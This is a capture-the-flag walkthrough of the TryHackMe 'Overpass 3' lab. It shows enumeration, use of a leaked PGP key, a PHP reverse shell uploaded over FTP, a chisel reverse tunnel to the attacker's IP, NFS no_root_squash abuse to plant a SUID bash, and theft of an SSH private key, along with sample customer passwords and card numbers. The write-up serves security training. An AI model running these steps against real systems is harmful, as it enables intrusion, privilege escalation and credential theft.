Overpass 3 WriteUp
This is my write ups for Overpass 3 Room on Try Hack Me.
This room is a CTF type of room
I will try to go deep into the technical thing we do in this room.
Task 1 - Overpass3 - Adventures in Hosting
Enum
- Always start with
nmapscan
Nmap Scan
mkdir nmap
nmap -sC -sV -oN nmap/initial $IP
nmap -p- -sV -oN nmap/all-port $IP
Nmap initial scan result
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
| 256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
|_ 256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
|_http-title: Overpass Hosting
Service Info: OS: Unix
- Since they have a web server running on port 80, we can try brute force directory with
gobuster
Gobuster brute force directory
gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gob_1.log
Gobuster result
/backups (Status: 301) [Size: 236] [--> http://10.10.122.48/backups/]
- Go over to
http://$IP/backups/
- Download the
backup.zipfile and unzip it
wget http://10.10.11.86/backups/backup.zip
unzip backup.zip
ls
backup.zip CustomerDetails.xlsx.gpg priv.key
- The
priv.keyis a PGP private key
file priv.key
priv.key: PGP private key block
- We can use this
priv.keyto decrypt theCustomerDetails.xlsx.gpgwithgpg
gpg --import priv.key
gpg --output Customer-Details --decrypt CustomerDetails.xlsx.gpg
- After that we can open the file
Customer-Details.xlsxthat we just decrypted and find
Customer Name | Username | Password | Credit card number | CVC
Par. A. Doxx | paradox | ShibesAreGreat123 | 4111 1111 4555 1142 | 432
0day Montgomery | 0day | OllieIsTheBestDog | 5555 3412 4444 1115 | 642
Muir Land | muirlandoracle | A11D0gsAreAw3s0me | 5103 2219 1119 9245 | 737
From this we can try to use these creds to do
ftplogin. And find thatparadox:ShibesAreGreat123workedAfter looking at the files on the
ftpserver, we can find out that we can upload file to theftpbecause those files are using to hosting the website.Lets upload a
php-reverse-shell.phpto theftpserver
put php-reverse-shell.php
- Now set up a listener and make a callback to our
nc -nvlp $YOUR_PORT
curl http://$IP/php-reverse-shell.php
- We can now upgrade the shell with
python3
python3 -c 'import pty;pty.spawn("/bin/bash")';
export TERM=xterm
- Getting the
web.flag
cat /usr/share/httpd/web.flag
thm{REDACTED}
Before you countinue
To do PrivEsc in this room, first you should take a look here in section NFS
- Now let go and do some
privesc
cat /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
- We will be using
chiselto exploit this machine
Using chisel to exploit
# Upload chisel to the victim machine from FTP
# On the attacker machine
chisel server -p 10000 --reverse
# On the victim machine
mv chisel /tmp
cd /tmp
chmod +x chisel
./chisel client 10.8.148.189:10000 R:2049:127.0.0.1:2049
# On the attacker machine
mkdir -p /tmp/nfs
sudo mount -t nfs4 -o proto=tcp,port=2049 127.0.0.1:/ /tmp/nfs -vv
- From here we should go to
rooton our machine then access the/tmp/nfs
sudo su
cd /tmp/nfs
cat user.flag
thm{REDACTED}
- Since we are root, we can make a copy of
/bin/bashhere and give itSticky bit(SUID)
cp /bin/bash .
chmod +s bash
- Now go over to
.sshto getJames's private key
cat .ssh/id_rsa
[REDACTED]
Don't forget
Remember to give the id_rsa correct permission of 600
- Now we can login as
JamesfromSSHand becomerootwithbash
ssh -i id_rsa james@$IP
./bash -p
whoami
cat /root/root.flag
thm{REDACTED}